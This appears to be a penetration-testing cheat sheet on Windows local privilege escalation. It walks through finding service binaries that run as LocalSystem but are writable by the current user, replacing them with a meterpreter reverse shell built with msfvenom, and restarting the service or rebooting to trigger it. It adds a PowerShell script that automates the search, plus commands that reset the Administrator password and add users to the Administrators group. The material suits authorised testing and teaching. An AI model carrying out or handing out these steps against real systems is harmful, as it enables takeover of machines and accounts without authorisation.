Windows privilege escalation -1-

  • wmic service get Name,PathName,StartName (list every service together with the binary it runs and the account it runs as; non-Microsoft services installed under Program Files or in a custom directory are the usual candidates, and a StartName of LocalSystem is what you want)
  • icacls "[full path to the service binary gathered above]" (check whether your own user, or a group you belong to such as Users or Authenticated Users, has write access to the file: look for (F) full control, (M) modify or (W) write in the output)

If the binary is writable, back up the original and replace it with something "more useful", e.g. a meterpreter reverse shell. Build the payload as a service executable (msfvenom -f exe-service): a plain executable that never registers with the Service Control Manager gets terminated after the start timeout (error 1053), often before the shell has called back. The payload only runs, with the service account's privileges, the next time the service starts, so you also need to be able to stop and start the service (sc stop / sc start) or to reboot the box; an Auto-start service is restarted by the reboot for you.  :-)
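The two manual checks above (wmic, then icacls on each candidate) are tedious on a box with a few hundred services, and wmic is deprecated on recent Windows builds. The following PowerShell script is an added example, not code from the original page: it walks every service, extracts the executable from the (possibly quoted, possibly argument-carrying) PathName, and reports those whose binary carries an Allow ACE granting write access to the current user or one of the groups in the user's token. It assumes it is run as the low-privileged user you are escalating from, on Windows 8 / Server 2012 or later (for Get-CimInstance); the function names and the $writeBits mask are this example's own choices.

```powershell
# Added example (not from the original page): automate "wmic service get ..."
# plus "icacls <binary>" for every service and keep only the binaries the
# current user can overwrite.
# Assumptions: run as the low-privileged account you want to escalate from;
# Get-CimInstance is available (Windows 8 / Server 2012 or later).

# SIDs of the current user and of every group carried by the current token.
$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids   = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

# FILE_WRITE_DATA (0x2) is part of Write, Modify and FullControl; the generic
# bits GENERIC_WRITE (0x40000000) / GENERIC_ALL (0x10000000) appear in ACEs
# that were never mapped to file-specific rights.
$writeBits = 0x2 -bor 0x40000000 -bor 0x10000000

function Get-ServiceBinaryPath {
    # Reduce a Win32_Service.PathName such as
    #   "C:\Program Files\Foo\foosvc.exe" -config x    or    C:\Foo\foosvc.exe /run
    # to the executable path alone.
    param([string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
    }
    $i = $p.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
    if ($i -ge 0) { return $p.Substring(0, $i + 4) }
    return $p.Split(' ')[0]
}

function Test-MyAce {
    # True if this ACE is an Allow entry for one of $mySids that includes a write bit.
    param([System.Security.AccessControl.FileSystemAccessRule]$Ace)
    if ($Ace.AccessControlType -ne 'Allow') { return $false }
    try {
        $sid = $Ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
    } catch { return $false }          # orphaned / unresolvable account: not us
    if ($mySids -notcontains $sid) { return $false }
    return (([int]$Ace.FileSystemRights -band $writeBits) -ne 0)
}

function Find-WritableServiceBinary {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { continue }
        # Binaries under %SystemRoot% are practically never writable; skip the noise.
        if ($bin.StartsWith($env:SystemRoot, [System.StringComparison]::OrdinalIgnoreCase)) { continue }
        try { $acl = Get-Acl -LiteralPath $bin } catch { continue }   # no READ_CONTROL on the file
        $hits = @($acl.Access | Where-Object { Test-MyAce $_ })
        if ($hits.Count -eq 0) { continue }
        [pscustomobject]@{
            Service   = $svc.Name
            RunsAs    = $svc.StartName     # LocalSystem is the interesting case
            StartMode = $svc.StartMode     # Auto: a reboot restarts it for you
            State     = $svc.State
            Binary    = $bin
            GrantedBy = ($hits | ForEach-Object { "$($_.IdentityReference):$($_.FileSystemRights)" }) -join '; '
        }
    }
}

Find-WritableServiceBinary | Format-Table -AutoSize -Wrap
```

The RunsAs and StartMode columns are the ones to read first: a writable binary of a service running as a restricted virtual account gains you little, and a Manual-start service still needs start permission (sc sdshow <service> shows its security descriptor) or some other trigger before the replaced binary ever executes.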

Win local stuff

This is still (very much) under construction. Although a lot of the information in this section is already available, I still haven't finished it yet. - So please be patient and come back a little later. THX

  • net user Administrator [new password] (reset the local Administrator password; needs administrative rights, but does not ask for the old password)
  • net localgroup Administrators [username] /add (add a user to the local Administrators group)
  • SetPassword [account-username] [new-password] [old-password] (change a password when the old one is known)
  • schtasks.exe /? (scheduled tasks; useful to run something at boot or under another account)
  • devcon.exe /? (device console from the Windows Driver Kit; not installed by default)
  • shutdown /r /t 0 (reboot immediately, e.g. to get an Auto-start service with a replaced binary started)